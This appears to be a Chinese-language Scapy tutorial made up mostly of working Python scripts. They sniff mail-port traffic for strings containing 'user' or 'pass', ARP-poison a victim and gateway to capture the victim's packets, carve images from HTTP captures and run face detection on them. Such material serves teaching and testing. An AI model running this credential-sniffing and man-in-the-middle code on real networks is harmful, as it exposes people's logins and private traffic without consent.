Scapy 是一个用来解析底层网络数据包的 Python 模块和交互式程序,它对底层包处理进行了抽象封装,使得对网络数据包的处理非常简便。该类库在网络安全领域有非常广泛的用例,可用于漏洞利用开发、数据泄露、网络监听、入侵检测以及流量的分析和捕获。Scapy 还可以与数据可视化和报告生成工具集成,方便地展示其结果和数据。



sniff(filter = " ", iface = "any", prn = function, count = N)

filter参数允许你指定一个Berkeley数据包过滤器(Berkeley Packet Filter,BPF),用于过滤Scapy嗅探到的数据包,也可以将此参数留空,表示要嗅探所有的数据包。



from scapy.all import sniff


def packet_callback(packet):
    """Dump every layer and field of one sniffed packet to stdout.

    Args:
        packet: The packet object handed to the callback by ``sniff``.
    """
    # show() prints the dump itself and returns None, so wrapping it in
    # print() would add a stray "None" line after every packet.
    packet.show()


def main():
    """Sniff a single packet and hand it to ``packet_callback``."""
    # The per-packet callback keyword is ``prn`` (the original ``pro`` is not
    # a sniff() argument, so the callback was never registered).
    sniff(prn=packet_callback, count=1)


if __name__ == '__main__':
    main()





from scapy.all import sniff, TCP, IP


def packet_callback(packet):
    """Print the destination and payload of TCP packets that look like logins.

    A packet is reported when its TCP payload, rendered as text, contains
    ``user`` or ``pass`` (case-insensitive).

    Args:
        packet: A sniffed packet that carries IP and TCP layers (the BPF
            filter used in ``main`` only lets TCP traffic through).
    """
    tcp_payload = packet[TCP].payload
    if not tcp_payload:
        return

    # Render the payload once and reuse it for both the test and the output.
    mypacket = str(tcp_payload)
    lowered = mypacket.lower()
    if 'user' in lowered or 'pass' in lowered:
        print(f"[*] Destination: {packet[IP].dst}")
        print(f"[*] {mypacket}")


def main():
    """Start sniffing mail traffic and report packets via ``packet_callback``."""
    # Listen on the ports commonly used by mail protocols:
    # 110 (POP3), 25 (SMTP) and 143 (IMAP).
    # store=0 tells Scapy not to keep any packets in memory, which matters
    # for a sniffer that is left running for a long time.
    sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',
          prn=packet_callback, store=0)


if __name__ == '__main__':
    main()





from multiprocessing import Process
from scapy.all import (ARP, Ether, conf, get_if_hwaddr,
                       send, sniff, sndrcv, srp, wrpcap)

import os
import sys
import time


def get_mac(targetip):
    """Return the MAC address that answers an ARP who-has for ``targetip``.

    Args:
        targetip: IP address to resolve.

    Returns:
        The source MAC of the first reply, or None if nothing answered.
    """
    # Broadcast the ARP request at layer 2 so every host on the segment sees it.
    packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
    resp, _ = srp(packet, timeout=2, retry=10, verbose=False)
    for _, r in resp:
        return r[Ether].src
    return None


class Arper:
    """ARP-poison a victim and its gateway, then capture the victim's traffic.

    Poisoning and sniffing each run in their own process (see ``run``).
    """

    def __init__(self, victim, gateway, interface='en0'):
        """Resolve both MAC addresses and configure Scapy's interface.

        Args:
            victim: IP address of the victim host.
            gateway: IP address of the gateway.
            interface: Network interface to send and sniff on.
        """
        self.victim = victim
        self.victimmac = get_mac(victim)
        self.gateway = gateway
        self.gatewaymac = get_mac(gateway)
        self.interface = interface
        conf.iface = interface
        conf.verb = 0

        print(f'Initialized {interface}:')
        # Report each host's MAC address, not its IP again / the other
        # host's MAC as the original banner did.
        print(f'Gateway ({gateway}) is at {self.gatewaymac}')
        print(f'Victim ({victim}) is at {self.victimmac}')
        print('_'*30)

    def run(self):
        """Start the poisoning process and the sniffing process."""
        self.poison_thread = Process(target=self.poison)
        self.poison_thread.start()

        self.sniff_thread = Process(target=self.sniff)
        self.sniff_thread.start()

    def poison(self):
        """Send forged ARP replies to victim and gateway until interrupted.

        On Ctrl-C the ARP tables are restored and the process exits.
        """
        # ARP reply (op=2) telling the victim that the gateway's IP is at
        # this host's MAC (hwsrc is left unset, so Scapy fills in its own).
        poison_victim = ARP()
        poison_victim.op = 2
        poison_victim.psrc = self.gateway
        poison_victim.pdst = self.victim
        poison_victim.hwdst = self.victimmac
        print(f'ip src: {poison_victim.psrc}')
        print(f'ip dst: {poison_victim.pdst}')
        print(f'mac dst: {poison_victim.hwdst}')
        print(f'mac src: {poison_victim.hwsrc}')
        print(poison_victim.summary())
        print('_'*30)

        # Mirror image: tell the gateway that the victim's IP is at this host.
        poison_gateway = ARP()
        poison_gateway.op = 2
        poison_gateway.psrc = self.victim
        poison_gateway.pdst = self.gateway
        poison_gateway.hwdst = self.gatewaymac
        print(f'ip src: {poison_gateway.psrc}')
        print(f'ip dst: {poison_gateway.pdst}')
        print(f'mac dst: {poison_gateway.hwdst}')
        print(f'mac_src: {poison_gateway.hwsrc}')
        print(poison_gateway.summary())
        print('_'*30)

        print('Beginning the ARP poison. [CTRL-C to stop]')
        while True:
            sys.stdout.write('.')
            sys.stdout.flush()
            try:
                send(poison_victim)
                send(poison_gateway)
                # Sleep inside the try block: the loop spends most of its
                # time here, so this is where Ctrl-C usually arrives, and
                # the ARP tables must still be restored in that case.
                time.sleep(2)
            except KeyboardInterrupt:
                self.restore()
                sys.exit()

    def sniff(self, count=200):
        """Capture packets to/from the victim, save them, then clean up.

        Args:
            count: Number of packets to capture before stopping.
        """
        # Presumably gives the poisoning process time to take effect.
        time.sleep(5)
        print(f'Sniffing {count} packets')
        # Use the instance's victim rather than a module-level global, so the
        # class also works when it is imported instead of run as a script.
        bpf_filter = "ip host %s" % self.victim
        # Inside this method the bare name ``sniff`` is still Scapy's
        # function; the method is only reachable as ``self.sniff``.
        packets = sniff(count=count, filter=bpf_filter, iface=self.interface)
        wrpcap('arper.pcap', packets)
        print('Got the packets')
        self.restore()
        self.poison_thread.terminate()
        print('Finished')

    def restore(self):
        """Broadcast the genuine IP-to-MAC mappings for victim and gateway."""
        print('Restoring ARP tables...')
        send(ARP(
            op=2,
            psrc=self.gateway,
            hwsrc=self.gatewaymac,
            pdst=self.victim,
            hwdst='ff:ff:ff:ff:ff:ff'),
            count=5)
        send(ARP(
            op=2,
            psrc=self.victim,
            hwsrc=self.victimmac,
            pdst=self.gateway,
            hwdst='ff:ff:ff:ff:ff:ff'),
            count=5)


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print(f'Usage: {sys.argv[0]} <victim-ip> <gateway-ip> <interface>')
        sys.exit(1)
    (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])
    myarp = Arper(victim, gateway, interface)
    myarp.run()



from scapy.all import TCP, rdpcap

import collections
import os
import re
import sys
import zlib

OUTDIR = '/root/Desktop/pictures'
PCAPS = '/root/Downloads'

Response = collections.namedtuple('Response', ['header', 'payload'])


def get_header(payload):
    """Parse the first HTTP header section found in ``payload``.

    Args:
        payload: Raw bytes of reassembled HTTP traffic.

    Returns:
        A dict mapping header names to values, or None when no blank line
        terminating a header section is found or when the section has no
        ``Content-Type`` field.
    """
    try:
        # Keep the first CRLF of the terminating blank line so that the
        # last header line still ends in "\r\n" and matches the regex.
        header_raw = payload[:payload.index(b'\r\n\r\n')+2]
    except ValueError:
        sys.stdout.write('_')
        sys.stdout.flush()
        return None

    # errors='replace' keeps one oddly-encoded stream from aborting the run.
    header = dict(re.findall(r'(?P<name>.*?): (?P<value>.*?)\r\n',
                             header_raw.decode(errors='replace')))
    if 'Content-Type' not in header:
        return None
    return header


def extract_content(Response, content_name='image'):
    """Pull the body out of a response if its Content-Type matches.

    Args:
        Response: A ``Response`` tuple (``header`` dict, ``payload`` bytes).
            The parameter name shadows the namedtuple; it is kept for
            compatibility with keyword callers.
        content_name: Substring that must occur in the Content-Type value.

    Returns:
        ``(content, content_type)``: the (decompressed) body bytes and the
        subtype after the ``/``; ``(None, None)`` if the type does not match.

    Raises:
        zlib.error: If the body claims gzip/deflate encoding but cannot be
            decompressed (e.g. a truncated capture).
    """
    content, content_type = None, None
    declared_type = Response.header['Content-Type']
    if content_name in declared_type:
        # Drop parameters such as "; charset=utf-8" so the subtype can be
        # used as a file extension.
        content_type = declared_type.split('/')[1].split(';')[0].strip()
        content = Response.payload[Response.payload.index(b'\r\n\r\n')+4:]

        # Decompress the body only; the header bytes in front of it are
        # not part of the compressed stream.
        encoding = Response.header.get('Content-Encoding')
        if encoding == "gzip":
            # MAX_WBITS | 32 enables automatic zlib/gzip header detection.
            content = zlib.decompress(content, zlib.MAX_WBITS | 32)
        elif encoding == "deflate":
            content = zlib.decompress(content)

    return content, content_type


class Recapper:
    """Rebuild HTTP payloads from a pcap file and write matching content."""

    def __init__(self, fname):
        """Read ``fname`` and group its packets into sessions.

        Args:
            fname: Path of the pcap file to load.
        """
        pcap = rdpcap(fname)
        # sessions() (plural) is the PacketList method that groups packets
        # per conversation; the attribute keeps its original name.
        self.session = pcap.sessions()
        self.responses = list()

    def get_responses(self):
        """Collect a ``Response`` for every session with a usable header."""
        for session in self.session:
            payload = b''
            for packet in self.session[session]:
                try:
                    if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                        payload += bytes(packet[TCP].payload)
                except IndexError:
                    # Packet has no TCP layer.
                    sys.stdout.write('x')
                    sys.stdout.flush()

            if not payload:
                continue
            header = get_header(payload)
            if header is None:
                continue
            # Only reached with a fresh, valid header for this session, so
            # no stale header from an earlier session can be stored.
            self.responses.append(Response(header=header, payload=payload))

    def write(self, content_name):
        """Write each matching response body to ``OUTDIR``.

        Args:
            content_name: Content-Type substring to extract (e.g. 'image').
        """
        os.makedirs(OUTDIR, exist_ok=True)
        for i, response in enumerate(self.responses):
            content, content_type = extract_content(response, content_name)
            if content and content_type:
                fname = os.path.join(OUTDIR, f'ex_{i}.{content_type}')
                print(f'Writing {fname}')
                with open(fname, 'wb') as f:
                    f.write(content)


if __name__ == '__main__':
    pfile = os.path.join(PCAPS, 'pcap.pcap')
    recapper = Recapper(pfile)
    recapper.get_responses()
    recapper.write('image')



import cv2
import os

ROOT = '/root/Desktop/pictures'
FACES = '/root/Desktop/faces'
TRAIN = '/root/Desktop/training'


def detect(srcdir=ROOT, tgtdir=FACES, train_dir=TRAIN):
    """Draw rectangles around faces in JPEG images and save the results.

    Args:
        srcdir: Directory scanned for ``.jpg`` / ``.jpeg`` files.
        tgtdir: Directory the annotated copies are written to.
        train_dir: Directory holding ``haarcascade_frontalface_alt.xml``.
    """
    # Load the classifier once instead of re-reading the XML per image.
    training = os.path.join(train_dir, 'haarcascade_frontalface_alt.xml')
    cascade = cv2.CascadeClassifier(training)

    for fname in os.listdir(srcdir):
        # image/jpeg content is typically saved with a ".jpeg" extension,
        # so accept both spellings.
        if not fname.upper().endswith(('.JPG', '.JPEG')):
            continue
        fullname = os.path.join(srcdir, fname)
        newname = os.path.join(tgtdir, fname)

        img = cv2.imread(fullname)
        if img is None:
            # Unreadable or corrupt image.
            continue

        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        rects = cascade.detectMultiScale(gray, 1.3, 5)
        # No detections come back as an empty sequence; test for that
        # directly rather than relying on an AttributeError.
        if len(rects) == 0:
            print(f'No faces found in {fname}')
            continue

        print('Got a face')
        # Convert (x, y, w, h) into (x1, y1, x2, y2) corner coordinates.
        rects[:, 2:] += rects[:, :2]

        # Highlight the faces in the image.
        for x1, y1, x2, y2 in rects:
            cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)),
                          (127, 255, 0), 2)
        cv2.imwrite(newname, img)


if __name__ == '__main__':
    detect()



